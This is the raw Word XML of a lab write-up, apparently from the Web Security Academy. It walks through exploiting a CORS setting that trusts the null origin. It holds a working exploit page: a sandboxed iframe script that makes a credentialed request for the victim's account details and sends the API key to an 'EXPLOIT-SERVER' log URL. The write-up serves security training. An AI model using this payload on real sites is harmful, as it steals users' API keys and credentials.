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07E0" w14:textId="32C78108" w:rsidR="00320924" w:rsidRDefault="00821258" w:rsidP="00821258">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r w:rsidRPr="00821258">
        <w:t>SCENARIO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688C087E" w14:textId="3F133424" w:rsidR="00821258" w:rsidRPr="00F10577" w:rsidRDefault="00F10577" w:rsidP="0077760B">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>The application has an insecure CORS configuration in it which forces the application to trust origins.</w:t>
      </w:r>
      <w:r w:rsidR="00566E4F">
        <w:t xml:space="preserve"> We’ll try to exploit the vulnerability by getting the administrator’s API key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0DB152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F4DB11" w14:textId="107FC522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BA9FE9B" w14:textId="680275D8" w:rsidR="00821258" w:rsidRDefault="00261147" w:rsidP="00777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vulnerable application and log in using the provided credentials and access the </w:t>
      </w:r>
      <w:r w:rsidRPr="00261147">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>my-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42BE0C54" w14:textId="12C2FC64" w:rsidR="003606DC" w:rsidRDefault="003606DC" w:rsidP="00777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Proxy tab in BurpSuite and we notice that there is a request made named </w:t>
      </w:r>
      <w:r w:rsidRPr="003606DC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>accountDetails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the API key of the user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087FAC43" w14:textId="7BFA75FE" w:rsidR="000E0652" w:rsidRDefault="00416927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will</w:t>
      </w:r>
      <w:r w:rsidR="00BC753C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> send this request to repeater and there we see that the </w:t>
      </w:r>
      <w:r w:rsidR="00BC753C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>ACAO</w:t>
      </w:r>
      <w:r w:rsidR="00BC753C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> header is set as true</w:t>
      </w:r>
      <w:r w:rsidR="000E0652">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> which could be a sign that the application allows requests from </w:t>
      </w:r>
      <w:r w:rsidR="00F27F69">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">null </w:t>
      </w:r>
      <w:r w:rsidR="000E0652">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>origins.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7345E8" w14:textId="11EDCDEC" w:rsidR="002F2030" w:rsidRDefault="002F2030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test this, we will add the Payload 1 in the request and send it, we see that it is accepted so now we will develop an exploit using some malicious JavaScript code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16933BB7" w14:textId="586AB8CB" w:rsidR="002F2030" w:rsidRDefault="002F2030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add the Payload 2 into the exploit server’s body and store then deliver it to the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EE9113" w14:textId="2F810622" w:rsidR="00EA0204" w:rsidRPr="000E0652" w:rsidRDefault="00EA0204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see that there comes a request with a unique URL and in it there comes the API key of the administrator</w:t>
      </w:r>
      <w:r w:rsidR="00C92793">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> encoded in URL format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D3E1450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9A802C" w14:textId="1879777C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1AB768A" w14:textId="456F77E1" w:rsidR="001D5FBD" w:rsidRDefault="001D5FBD" w:rsidP="001D5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Origin:</w:t>
      </w:r>
      <w:r w:rsidR="004D4B30">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8B777A" w14:textId="77777777" w:rsidR="004D4B30" w:rsidRDefault="004D4B30" w:rsidP="004D4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>html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE372E4" w14:textId="77777777" w:rsidR="004D4B30" w:rsidRDefault="004D4B30" w:rsidP="004D4B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0123BB" w14:textId="63736480" w:rsidR="004D4B30" w:rsidRPr="004D4B30" w:rsidRDefault="004D4B30" w:rsidP="004D4B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>&lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C4A456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&lt;iframe style="display: none;" sandbox="allow-scripts" srcdoc="</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE14432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&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2901FA8C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var xhr = new XMLHttpRequest();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF5922B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var url = 'https://ac371f531f693ef3c07b84de00630017.web-security-academy.net'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F55623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</w:p>
    <w:p w14:paraId="2CF64060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lastRenderedPageBreak/>
        <w:t xml:space="preserve">            xhr.onreadystatechange = function() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E107D89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    if (xhr.readyState == XMLHttpRequest.DONE) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59ACE8BA" w14:textId="4A698A40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        fetch('http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>EXPLOIT-SERVER</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4B30">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>/log?key=' + xhr.responseText)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5969206E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10DF547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F876C0C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</w:p>
    <w:p w14:paraId="0948FE9A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xhr.open('GET', url + '/accountDetails', true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505BFF55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xhr.withCredentials = true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745F5237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    xhr.send(null);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E20F3B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    &lt;/script&gt;"&gt;&lt;/iframe&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066EF8AB" w14:textId="77777777" w:rsidR="004D4B30" w:rsidRPr="004D4B30" w:rsidRDefault="004D4B30" w:rsidP="004D4B30">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D4B30">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBB82E0" w14:textId="6A466E5E" w:rsidR="00821258" w:rsidRDefault="004D4B30" w:rsidP="004D4B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4B30">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED8ABC7" w14:textId="14A6851D" w:rsidR="00821258" w:rsidRP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821258" w:rsidRPr="00821258" w:rsidSect="00821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530F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="237CB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55C8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="18A49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1106">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="108816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8"/>
    <w:rsid w:val="000E0652"/>
    <w:rsid w:val="001D5FBD"/>
    <w:rsid w:val="00261147"/>
    <w:rsid w:val="002F2030"/>
    <w:rsid w:val="00320924"/>
    <w:rsid w:val="003606DC"/>
    <w:rsid w:val="00416927"/>
    <w:rsid w:val="004D4B30"/>
    <w:rsid w:val="004F2D48"/>
    <w:rsid w:val="00566E4F"/>
    <w:rsid w:val="0077760B"/>
    <w:rsid w:val="00821258"/>
    <w:rsid w:val="009D2559"/>
    <w:rsid w:val="00BC753C"/>
    <w:rsid w:val="00C92793"/>
    <w:rsid w:val="00DA161C"/>
    <w:rsid w:val="00EA0204"/>
    <w:rsid w:val="00F10577"/>
    <w:rsid w:val="00F2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5E5"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{77BD95C2-9AF3-456C-A9A0-314555A1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58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21258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77760B"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr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77760B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2023-09-20T05:52:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-09-20T06:15:00Z</dcterms:modified>
</cp:coreProperties>
</file>